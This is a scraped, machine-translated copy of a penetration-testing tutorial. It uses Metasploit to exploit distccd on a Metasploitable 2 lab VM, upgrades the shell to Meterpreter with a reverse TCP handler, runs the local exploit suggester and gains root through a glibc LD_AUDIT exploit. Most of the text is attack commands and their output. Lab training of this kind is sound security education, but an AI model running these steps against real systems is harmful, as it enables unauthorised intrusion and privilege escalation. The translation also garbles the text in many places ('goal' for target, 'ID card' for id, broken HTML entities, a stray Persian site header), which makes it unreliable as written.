قالب وردپرس درنا توس
Home / Tips and Tricks / How do you root with Metasploit & # 39; s local Exploit Suggester «Null Byte :: WonderHowTo

How do you root with Metasploit & # 39; s local Exploit Suggester «Null Byte :: WonderHowTo



So you managed to get a shell on the target, but you only have measly low rights. What now? Privilege escalation is a huge field and can be one of the most rewarding but frustrating stages of an attack. We could follow the manual route, but as always, Metasploit makes it easy to perform local escalation of privileges and get root with the exploit suggester module.

To go through the process, we use Kali Linux as the attacking machine and Metasploitable 2 as the target. You can set up or use a similar pen test laboratory – or the same – to follow along with the guide below.

Step 1: Get session on goal

The first thing to do is get a session with low rights to the goal. We can easily do this with Metasploit. Type msfconsole in the terminal to start it.

  ~ $ msfconsole

[-] Removing the Metasploit Framework console ... 
[-] * WARNING: No database support: No database YAML file
[-] ***

. ,,. .
.  $$$$$ L .. ,, == aaccaacc% # s $ b. d8, d8P
d8P # $$$$$$$$$$$$$$$$$$$$$$$$$$$$$ b. `BP d888888p
d888888P & # 39; 7 $$$$  "" "" & # 39; & # 39; ^^ `` .7 $$$ | D * "& # 39;` `? 88 & # 39;
d8ockb.d8p d8888b? 88 & # 39; d888b8b _.os # $ | 8 * "` d8P? 8b 88P
88P`? P & # 39 ;? P d8b_, dP 88P d8P & # 39 ;? 88 .oaS ### S * "` d8P d8888b $ whi? 88b 88b
d88 d8? 8 88b 88b 88b, 88b .osS $$$$ * "? 88, .d88b, d88 d8P & # 39 ;? 88 88P`? 8b
d88 & # 39; d88b 8b`? 8888P & # 39; & # 39 ;? 8b`? 88P & # 39;. AS $$$$ Q * "` `? 88 & # 39 ;? 88? 88 88b d88 d88
.a # $$$$$$ "` 88b d8P 88b`? 8888P & # 39;
, s $$$$$$$ "` 888888P & # 39; 88n _. ,,, ass;:
.a $$$$$$$ P` d88P & # 39;.,. ass% # S $$$$$$$$$$$$$$ & # 39;
.a $ ### $$$ P` _. ,, - aqsc # SS $$$$$$$$$$$$$$$$$$$$$$$$$$$ & # 39;
, a $$ ### $$ P` _., - ass # S $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ #### SSSS & # 39;
.a $$$$$$$$$$ SSS $$$$$$$$$$$$$$$$$$$$$$$$$$$ SS ## == - "" & # 39; & # 39; ^^ / $$$$$$ & # 39;
_______________________________________________________________, & $$$$$$ & # 39; _____
ll && $$$$ & # 39;
. ;; lll &&&&& # 39;
... ;; lllll && # 39;
...... ;;; llll ;;; ....
`...... ;;;; ....

= [ metasploit v5.0.20-dev                          ]
+ - - = [ 1886 exploits - 1065 auxiliary - 328 post       ]
+ - - = [ 546 payloads - 44 encoders - 10 nops            ]
+ - - = [ 2 evasion                                       ]

msf5> 

Metasploitable contains a vulnerable service called distccd, which is used to distribute program compilation across multiple systems, speeding things up by using combined processor power. Unfortunately, with this version of the program, an external attacker can execute arbitrary commands on the server.

We can search the exploit with the command search :

  msf5> search distcc

Matching modules
================

# Name Disclosure Date Rank Control Description
- ---- --------------- ---- ----- -----------
0 exploit / unix / misc / distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution 

Type to load the module, use followed by the full path of the module:

  msf5> use exploit / unix / misc / distcc_exec 

We can now see the available settings with the command options :

  msf5 exploit (unix / misc / distcc_exec)> options

Module options (exploit / unix / misc / distcc_exec):

Name Current setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR ID
RPORT 3632 yes The target port (TCP)

Exploit purpose:

ID name
- ----
0 Automatic target 

It seems that we only need to set the external host address, because the external port is already set with the default port number. Use the command set to specify the correct IP address of the target:

  msf5 exploit (unix / misc / distcc_exec)> set rhosts 10.10.0.50

rhosts => 10.10.0.50 

Now we are ready to start the exploit. Use the command execute which is only a shorter alias for exploit:

  msf5 exploit (unix / misc / distcc_exec)> execute

[*] Started dual TCP handler at 10.10.0.1:4444
[*] Accepted the first client connection ...
[*] Accepted the second client connection ...
[*] Command: echo sWI9yfQYbPxuIGrh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets ...
[*] Reading from socket B
[*] B: "sWI9yfQYbPxuIGrh  r  n"
[*] Matching ...
[*] A is input ...
Command shell session 1 opened (10.10.0.1:4444 -> 10.10.0.50:58006) on 2019-11-19 11:46:02 -0500

uname -a
Linux metasploitable 2.6.24-16 server # 1 SMP Thu 10 April 13:58:00 UTC 2008 i686 GNU / Linux 

We can see that a command shell has been opened and is running uname -a verifies that we have compromised the goal.

Step 2: Upgrade to Meterpreter

To use Metasploit's local exploit suggester, we must upgrade our standard Unix command shell to a Meterpreter session. While still in the basic command scale, press Ctrl-Z to background the session. Press Y if you are asked to background it.

  Background session 1? Y
msf5 exploit (unix / misc / distcc_exec)> 

We have now fallen back to the main Metasploit prompt and we can verify all sessions that we run in the background with the command sessions :

  msf5 exploit (unix / misc / distcc_exec)> sessions

Active sessions
===============

ID Name Type Information Connection
- ---- ---- ----------- ----------
1 shell cmd / unix 10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50) 

The easiest way to upgrade a normal shell to a Meterpreter session is the flag -u to use followed by the session number to upgrade:

  msf5 exploit (unix / misc / distcc_exec)> sessions -u 1

[*] & # 39; post / multi / manage / shell_to_meterpreter & # 39; run on session (s): [1]

[*]   ID of session upgrade: 1
[*] Start exploit / multi / handler
[*] Started reverse TCP handler at 10.10.0.1:4433
[*] Send phase (985320 bytes) to 10.10.0.50
[*] Meterpreter session 2 opened (10.10.0.1:4433 -> 10.10.0.50:32979) on 2019-06-19 11:47:52 -0500
Job Stack Progress: 100.00% (773/773 bytes) 

We can see the mail module being executed and a new session being opened. We can re-verify this with the command sessions :

  msf5 exploit (unix / misc / distcc_exec)> sessions

Active sessions
===============

ID Name Type Information Connection
- ---- ---- ----------- ----------
1 scale cmd / unix 10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
2 meterpreter x86 / linux uid = 1, gid = 1, euid = 1, egid = 1 @ metasploitable.localdomain 10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50) 

And we can communicate with our new Meterpreter session with the flag -i on the desired session:

  msf5 exploit (unix / misc / distcc_exec)> sessions -i 2

[*] Begin interaction with 2 ...

meterpreter> 

Step 3: Run Exploit Suggester

Metasploit post modules work by running a background session, not directly in the session itself, so background session 2 (our Meterpreter shell) and returning to the main prompt. We can then load the local exploit suggester with the following command:

  msf5 exploit (unix / misc / distcc_exec)> use post / multi / recon / local_exploit_suggester 

If we look at the options, we only need to specify the session on which we want to perform this:

  msf5 post (multi / recon / local_exploit_suggester)> options

Module options (post / multi / recon / local_exploit_suggester):

Name Current setting Required Description
---- --------------- -------- -----------
SESSION yes The session on which this module is executed
SHOW DESCRIPTION false yes Displays a detailed description of the available exploits 

Simply set the session to number 2, which is our Meterpreter shell:

  msf5 post (multi / recon / local_exploit_suggester)> set up session 2

session => 2 

And type run to kick it off:

  msf5 post (multi / recon / local_exploit_suggester)> execute

[*] 10.10.0.50 - Collecting local exploits for x86 / linux ...
[*] 10.10.0.50 - 26 exploit checks are being attempted ...
[+] 10.10.0.50 - exploit / linux / local / glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit / linux / local / glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit / linux / local / netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[*] Post module execution completed 

We can see that the module checks a number of local exploits and returns a number that appear viable. Awesome.

Step 4: Get root

The last thing we need to do is use one of these exploits to get root on the system. We will try the first one that has been proposed to us. This exploit uses a vulnerability in the dynamic link of glibc, where the environment variable LD_AUDIT allows the loading of a setuid object that is eventually executed with root rights.

  msf5 post (multi / recon / local_exploit_suggester)> use exploit / linux / local / glibc_ld_audit_dso_load_priv_esc 

Looking at the options, we only need to reset the session – the default executable path works for now:

  msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> options

Module options (exploit / linux / local / glibc_ld_audit_dso_load_priv_esc):

Name Current setting Required Description
---- --------------- -------- -----------
SESSION yes The session on which this module is executed.
SUID_EXECUTABLE / bin / ping yes Path to an executable SUID

Exploit purpose:

ID name
- ----
0 Automatic 

Set up the session as before:

  msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> set up session 2

session => 2 

We can also set the payload to give us another Meterpreter session when the exploit is complete:

  msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> set payload linux / x86 / meterpreter / reverse_tcp

payload => linux / x86 / meterpreter / reverse_tcp 

And set the correct listening host (the IP address of our local machine) and port:

  msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> set lhost 10.10.0.1

lhost => 10.10.0.1

msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> set lport 4321

lport => 4321 

Finally, type run to start the exploit:

  msf5 exploit (linux / local / glibc_ld_audit_dso_load_priv_esc)> run

[*] Started reverse TCP handler at 10.10.0.1:4321
[+] The target appears to be vulnerable
[*] Use target: Linux x86
[*] & # 39; /tmp/.BlrZu4n' write (1271 bytes) ...
[*] & # 39; /tmp/.18qZUt' write (281 bytes) ...
[*] & # 39; /tmp/.DoiFwlxPt' write (207 bytes) ...
[*] Launch exploit ...
[*] Send phase (985320 bytes) to 10.10.0.50
[*] Meter talker session 3 opened (10.10.0.1:4321 -> 10.10.0.50:56950) on 2019-11-19 11:57:19 -0500

meterpreter> 

We now have a new Meterpreter session about the target and we can fall into a shell to check if we have obtained root access:

  meterpreter> shell
Process 4886 created.
Channel 1 made.
ID card
uid = 0 (root) gid = 0 (root) groups = 1 (daemon)
uname -a
Linux metasploitable 2.6.24-16 server # 1 SMP Thu 10 Apr. 13:58:00 UTC 2008 i686 GNU / Linux 

Wrapping

In this tutorial we learned how we can use Metasploit to target a shell, upgrade that shell to a Meterpreter session and use the local one exploit-suggestor module to eventually become root on the system. Metasploit not only makes the first exploitation simple, but also the post-exploitation phase. In the following article we will explore some useful post modules to collect information about the goal quickly.

Cover image by Pixabay / Pexels; Screenshots of drd_ / Null Byte

Source link